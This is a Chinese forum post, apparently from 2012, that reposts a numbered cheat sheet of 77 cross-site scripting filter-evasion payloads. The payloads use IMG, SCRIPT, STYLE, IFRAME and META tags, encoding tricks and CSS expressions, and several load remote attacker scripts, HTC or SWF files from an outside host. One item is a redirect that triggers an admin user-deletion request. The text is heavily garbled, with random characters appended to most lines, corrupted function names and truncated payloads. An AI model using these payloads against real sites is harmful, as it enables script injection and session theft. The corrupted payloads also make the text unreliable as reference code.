貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
1 I; x; |. L; e( u" |; R- l$ f6 v- ]! B6 N' [' w1 I) ~9 s; H
(1)普通的XSS JavaScript注入5 z* j# U* u6 l5 Q6 t- b
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>: u% b i5 o& H2 U; m
) M8 m6 _) i C3 O5 q5 E (2)IMG标签XSS使用JavaScript命令 L. `; ?# E, u1 A' t* V, h- y$ k& b
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
- b! @- P2 h( p2 q4 E2 X
6 d) C0 d- W# I (3)IMG标签无分号无引号
2 M0 g& a5 p9 S; i <IMG SRC=javascript:alert(‘XSS’)>5 l; ?4 b" L% J; X8 ]5 B4 U# `
3 e' B2 P: n5 T+ X/ b+ ]$ k' O
(4)IMG标签大小写不敏感
5 x/ e9 f" K2 `: M! d* B <IMG SRC=JaVaScRiPt:alert(‘XSS’)>$ D0 X# H! d, u- |9 E, c2 O
% {% k4 F! T, p3 h' P- V (5)HTML编码(必须有分号)
$ g, D8 r' \4 F& o <IMG SRC=javascript:alert(“XSS”)>- R) l8 n6 [5 c' `$ b
6 {4 ?& i: h2 H3 K4 j
(6)修正缺陷IMG标签
2 _ _; U- u/ \1 v% Z9 n7 P) l; l <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>+ F( n# w7 S7 i& t j% u
( y7 L( W4 ^8 U/ `# o* K7 s
(7)formCharCode标签(计算器)6 P8 E+ ]( S7 M" ]+ n& {$ K) h
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>. H' c- m1 B. i& O. k( X
0 A# q* z) z* w (8)UTF-8的Unicode编码(计算器)
/ X( L/ {7 ^5 m- R# u7 | <IMG SRC=jav..省略..S')>
; t: ]! b9 W# Y- O, G5 l& t2 c
3 [! m! o/ U B- s/ ^% V- n (9)7位的UTF-8的Unicode编码是没有分号的(计算器)
2 m, I% \ i/ e3 X. {, K, U <IMG SRC=jav..省略..S')>( u, A$ o) w7 J: Q+ B
; h, \/ t2 B5 L& `; [
(10)十六进制编码也是没有分号(计算器)
* ?) x; K; y! R; H6 I <IMG SRC=java..省略..XSS')>- d4 J4 q& E% d* G4 ?* c
0 K8 J$ _5 f& v1 { (11)嵌入式标签,将Javascript分开
% U8 w& ?; J) O+ s3 t9 ~ <IMG SRC=”jav ascript:alert(‘XSS’);”>
+ d" l, c4 y1 a( F$ p$ |
# \* ]4 M9 E$ k& C0 U! J$ L9 k (12)嵌入式编码标签,将Javascript分开6 h- u K5 s. D( Z) }, N- \
<IMG SRC=”jav ascript:alert(‘XSS’);”># t' y' C+ b) E
$ H. _. A: D" A
(13)嵌入式换行符# z. R: B6 m j: v9 l; C# E
<IMG SRC=”jav ascript:alert(‘XSS’);”>: }5 c) W2 A6 v+ D. K9 V
( n- C+ a- \5 ]! j P0 T- H$ S. E( |- Q
(14)嵌入式回车2 Z" a# Q8 K- A8 s7 t; }
<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 Q, L. _, d- U+ E6 ~6 c E* `8 y7 L
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
7 Y* {* u- i/ C7 v( N) R <IMG SRC=”javascript:alert(‘XSS‘)”> h% z( _% c! W: m% G9 H; g3 f0 V
7 ^ l6 I0 O0 P# y
(16)解决限制字符(要求同页面)
" L; o( }1 r ^6 b/ j& ~ <script>z=’document.’</script>
; i o* d2 A- r' i <script>z=z+’write(“‘</script>
R6 D, O" M6 [, m3 _6 C5 h6 f <script>z=z+’<script’</script>: K- h- d$ y) ? H2 b
<script>z=z+’ src=ht’</script>0 u6 K+ J/ z |$ D$ L6 g
<script>z=z+’tp://ww’</script>
1 {1 c6 W; }# k, `4 h/ X0 \ <script>z=z+’w.shell’</script>( ?7 T+ r% g9 D, W5 Z, A* ?
<script>z=z+’.net/1.’</script>2 @# n$ W5 L! i/ ?/ T* E/ d
<script>z=z+’js></sc’</script>7 k+ ~: T0 s6 X1 K: r: B) h, R
<script>z=z+’ript>”)’</script>
: C2 L' \0 W P! Z9 A <script>eval_r(z)</script># O7 z9 v. N5 Q( d6 W& ]
$ \. |( l" K# s2 z' P+ [% D
(17)空字符5 p$ M- J+ g/ `3 p# Z8 o& k7 u1 f
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out- _6 h p- m0 v4 L9 `3 d
; e, u7 [) y3 X; i4 L, S
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用, n$ D- y" j$ a) S1 @+ o
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out! K1 D& {" ^* D/ k
3 w# M# k5 g2 F7 o (19)Spaces和meta前的IMG标签8 E# J7 I. J; `! S5 C8 {
<IMG SRC=” � javascript:alert(‘XSS’);”>
; Z* o) B# f, ]; j) @% k( G1 _' T( _% C$ C
(20)Non-alpha-non-digit XSS
+ x9 @7 E; `, L( \ <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>! V4 Y9 t) a7 o/ u( b
( t9 y( e+ ~* I
(21)Non-alpha-non-digit XSS to 2; K7 G* e5 e7 g O. `
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>8 t8 y1 l) K% t; c4 G5 t5 v
. {7 U3 y8 Z0 w) E: N! K (22)Non-alpha-non-digit XSS to 3 m# c6 V+ c6 m- U
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
. z; s, u& m7 e3 T' Z6 c9 |) z' C# N$ w9 [ L/ M- r) y/ T
(23)双开括号" e( `$ M) Z- N5 y
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
. W& x: D: P; Y: D7 }7 M. O
6 n+ Z0 _, Q) _; b. \1 o (24)无结束脚本标记(仅火狐等浏览器)
' R: W y/ \+ o& x+ w# G, R+ p <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>3 p( f A3 o! L9 w1 p
' n3 D7 F8 p& W* n; `2 _9 C
(25)无结束脚本标记22 ^+ I" E! p( A/ W4 q' X
<SCRIPT SRC=//3w.org/XSS/xss.js>/ a/ X; [" a6 x$ r3 w
2 F4 p6 e3 S! p (26)半开的HTML/JavaScript XSS
' w* \" q! ^8 y* h& U( @" `6 q <IMG SRC=”javascript:alert(‘XSS’)”1 e( L; T6 W) O) ]7 ?3 c6 E! B3 T
3 {# ]4 e9 h, P (27)双开角括号
. j" c2 u3 m% w( x- y E4 u4 s <iframe src=http://3w.org/XSS.html <
$ u2 ]# D4 t2 b9 I. s; c- y8 F% o2 [; G1 n* N
(28)无单引号 双引号 分号
) F( ? D' K ~7 s, n <SCRIPT>a=/XSS/
* `7 ]. ~* N4 B4 P- Q6 Y% r alert(a.source)</SCRIPT>! z& f- E w+ S* g4 C
4 M0 M' ^1 z! y+ k (29)换码过滤的JavaScript
2 k8 q6 l( A+ H+ D& `- M* ~" j \”;alert(‘XSS’);//
( E) l7 U6 e# ~3 Q+ M
$ V: h ~/ k' D+ h9 m+ l3 e (30)结束Title标签6 K% |+ \/ s, d( }( j, `
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>/ S) V2 I3 R6 \7 Y/ o* C
' a4 O! e7 B. n1 W0 R# Q (31)Input Image
0 A9 j. @5 I; N' y! X <INPUT SRC=”javascript:alert(‘XSS’);”>! x0 Y2 x, X( g! k* R
$ X5 D* P5 K! e. X$ ~5 h
(32)BODY Image
' L% r# [+ Z% G: L <BODY BACKGROUND=”javascript:alert(‘XSS’)”>4 }6 E* \% k" h8 i1 a1 _& G7 H
1 [+ o* ]. ^2 ~1 U
(33)BODY标签8 d! ^, p- f) f( a. U
<BODY(‘XSS’)>
0 a8 ~. q5 y/ z! g8 m2 ^, j+ w4 h$ c
(34)IMG Dynsrc4 B% k( i2 v, S, r
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
' ^( W+ y; `; G% ~" T* R
$ G5 Q7 I4 u& h' | (35)IMG Lowsrc
% g f" V3 a8 e$ n* Q' w <IMG LOWSRC=”javascript:alert(‘XSS’)”>, |0 A! H/ l( ]+ ^# o8 A
3 [' w7 q8 K; F (36)BGSOUND
" l7 t' S7 P( L- [5 J- w <BGSOUND SRC=”javascript:alert(‘XSS’);”>
$ D# S1 K. B- ^
1 H1 e4 l8 V! T, `; g (37)STYLE sheet0 v- A( t- e( c* j! x. m% h
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
/ K: A+ ]# W" V/ Z, x1 R5 X( W& {- ?- W, |1 f9 X) N9 }2 e9 |
(38)远程样式表
. _! o2 Q* m4 r! f <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
p+ l$ e3 s( A" @* w3 U
! F. G5 o9 e. f (39)List-style-image(列表式)
) q6 P; A* ^/ A w* @( c <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS0 U2 r: @, J" c. L% Z7 F) G
& E2 t+ k6 R; t4 n* P* x0 Q( U (40)IMG VBscript
- | t- h' }# Y1 k <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS4 Z! P! a# Z3 O3 c2 p9 @4 J7 C
! t' c( }. z" @; I: o
(41)META链接url0 q; U* C4 k; L6 v
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>% B$ `4 o' q3 `+ g5 H
x, H2 f; }: I9 L" ]+ n
(42)Iframe
% Q- ~; {/ K: d8 J <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>, a& ]$ q# W0 j D- A
2 t, Q _) T V3 V% u2 ]4 k
(43)Frame& Z* s, U6 d- D
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
! u+ N5 s. w' ~/ @# O& g. r& S* R4 P# S
(44)Table
7 m) k; S9 i* M0 X' I+ o4 t% _ <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
: v+ r2 F' u, M5 |. I- O3 N2 Z. i
( N& c- R* v8 W# z" z (45)TD
' S: F6 K8 G+ n- P% c <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>5 o; r7 z* F1 @7 W6 J0 U
% q2 j$ F: {0 C6 J' d) K) @4 z
(46)DIV background-image9 l3 r$ @& ^) I# U/ H& ?- Y+ ]
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
; `& d! C8 l1 i3 o0 v P8 K6 A8 V( Z% q: |
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)5 r5 Q8 q# e) G1 T4 j
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”> E# n* ?$ t* A) ]* P
1 N& l9 ]# g4 z" x7 ~ (48)DIV expression
8 t2 {+ A* p: F <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
( X2 h: G- m1 r# e1 U" V: o2 J9 N4 m/ j: \
(49)STYLE属性分拆表达' j0 {1 W# S; I, f
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
2 Y' J1 ~7 L7 d$ X8 `
# U4 N; c0 V* H; d7 V7 N* X (50)匿名STYLE(组成:开角号和一个字母开头)1 d& Z; \" i: W' r I+ {
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
" Y5 Y; |% _, g! k: y4 ^% k4 ^+ a3 Y: `. D3 ^
(51)STYLE background-image! \& H: U" D1 j. U- q
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>9 v7 w3 j& t6 p. U: W- ?% w
4 R6 g7 F. v9 X (52)IMG STYLE方式 S+ f. Y. B/ G7 V
exppression(alert(“XSS”))’>
! u, @6 M) [$ E6 ]( q' H' Q0 n, ?: [/ o% F M3 u
(53)STYLE background# B2 ^6 F3 u% P3 L4 k; ?( h0 O, B
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>' W6 H( I! g7 a( Z$ U
! x4 x+ T6 K1 y4 x* \
(54)BASE
4 X/ h* m9 N- _$ r3 j <BASE HREF=”javascript:alert(‘XSS’);//”>6 e7 ]& k& j( I% {( m' Z- [2 }
5 l# e% D2 z( l" M (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS" r" g) @* }; k
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>% G1 ^# k. F( h$ w7 M
* S0 V q6 }5 Y2 t3 u4 T (56)在flash中使用ActionScrpt可以混进你XSS的代码& R7 Q# t+ ]! v- ^
a=”get”;* }) _) o6 u7 N$ V
b=”URL(\”";
O0 c; q5 [$ }4 Y c=”javascript:”;2 s% a- a9 I Z/ U5 h
d=”alert(‘XSS’);\”)”;
% [! R8 P. [/ U# W+ } eval_r(a+b+c+d);3 ?4 h* C- H6 f$ @6 V
5 ^5 a! D7 J$ @+ V; _
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上- W1 Q4 l- c- l. X0 ^
<HTML xmlns:xss>4 V4 k' V3 x2 B H5 ?1 F/ u
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>9 g! W1 u5 N g( ~8 a% g1 f {
<xss:xss>XSS</xss:xss>. B! Z* F# t/ D, |6 H0 l! J( a
</HTML>, i4 w4 W6 H6 s/ x+ D" _
7 D8 c9 R/ y5 E5 e
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用5 h# ?- q& m7 y. I" s
<SCRIPT SRC=””></SCRIPT>" w! O1 W: t2 e( G1 Q9 `
( Y. ^7 E, \$ z$ c# n
(59)IMG嵌入式命令,可执行任意命令
6 F) B- \- s/ E$ N n2 j+ m. J <IMG SRC=”http://www.XXX.com/a.php?a=b”>
" z( B: t4 |0 q: P2 i! T
, C/ C ]/ z1 B6 X! k (60)IMG嵌入式命令(a.jpg在同服务器)
4 w- p9 `$ Q% S+ c) U: x9 {4 @ Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
' ]( e2 S9 h8 H1 L
9 q( \1 j1 m" u% D7 } (61)绕符号过滤
- x' G% b) N: s# F& j: }) ] <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>, I+ b) O, Q& Z3 E" q, [8 @( Z0 q
# T6 S* J! l$ Q
(62)7 G2 y1 S+ F4 v1 D$ c% G2 | T2 s
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
F4 N( Y' ~8 I. W$ [$ b, u- C& n6 _3 k' ^; R2 t
(63)
, V# k& W# D; z4 \' }1 d+ X <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
' |9 _( m. Y/ W1 w: ~9 x
. y, B$ p* X# L2 i% G (64)' G" o% s- j' d! I* M
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
9 o$ `7 p' B( B" @3 @# e
) z2 q% J: e" l$ l2 T/ m (65)
/ N* ]5 ?! X; b5 k/ n5 v) w <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT> K# p v0 J. Z* P k& k) |
/ D7 _( q0 C4 C# i" G6 I
(66)
" i2 J3 |6 m# L: s <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
" g' @' P+ R, J! q4 x
) c1 G$ }; t8 W, x' G1 ]- e (67) b/ G1 d7 o0 C6 v& g* v
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
6 C9 C( C% z: _7 O8 L$ w9 G3 y* @$ t* O& i
(68)URL绕行. [" s7 ~0 `8 L! @1 g
<A HREF=”http://127.0.0.1/”>XSS</A>
/ o' V7 x8 y$ G" P( G+ c& W5 X
( U7 {7 A) A5 s6 n A (69)URL编码, A$ W6 W# }# W/ J& [+ w: M
<A HREF=”http://3w.org”>XSS</A>* U& D; f9 ~& c7 r8 N7 X; F* E
, n5 n2 p/ _+ h3 t6 i (70)IP十进制
/ I! W0 X+ b3 G8 T u8 V <A HREF=”http://3232235521″>XSS</A>
" Z* m8 f' y5 o- c# H% ~7 t
# ?3 k" i$ r) M& \5 U4 s (71)IP十六进制5 J8 j0 T6 I" K: _# p& a) @$ H* N
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
0 A. B) m: ?, w7 S
, c! {, Z9 k* i; B" \2 P" {6 N (72)IP八进制
% R+ R/ {& e) k/ L, ` <A HREF=”http://0300.0250.0000.0001″>XSS</A>0 m+ @ U) n8 c9 {+ b
, {$ U. @) p$ A6 u2 L
(73)混合编码: g0 p9 k# Y* f
<A HREF=”h
% n+ `1 f. F9 Q# x5 w tt p://6 6.000146.0×7.147/”">XSS</A> M- ^! v, Y; @7 q9 B7 T' k8 j
Z4 I# H3 w* z, M: D2 b/ ^ (74)节省[http:]
2 j O6 p" r& x3 r( ^9 Y7 O" ~- Y <A HREF=”//www.google.com/”>XSS</A>9 M1 x0 t$ P' I: c
$ Y4 \; _* E* L& Y5 V (75)节省[www]
3 L# D7 a# e: c* l: B4 o. p" I, S <A HREF=”http://google.com/”>XSS</A>
1 J* M8 A9 j+ i5 u! @1 n A8 ]& N6 l. `9 Z8 F& Y5 _- n2 Y& S) G% y
(76)绝对点绝对DNS$ P3 s6 i9 W- B
<A HREF=”http://www.google.com./”>XSS</A>' y0 { _9 K0 h& N$ {
. ?* Y" l% A8 E T: v$ b/ ~ (77)javascript链接
( p; o% R( X6 M6 H0 h <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对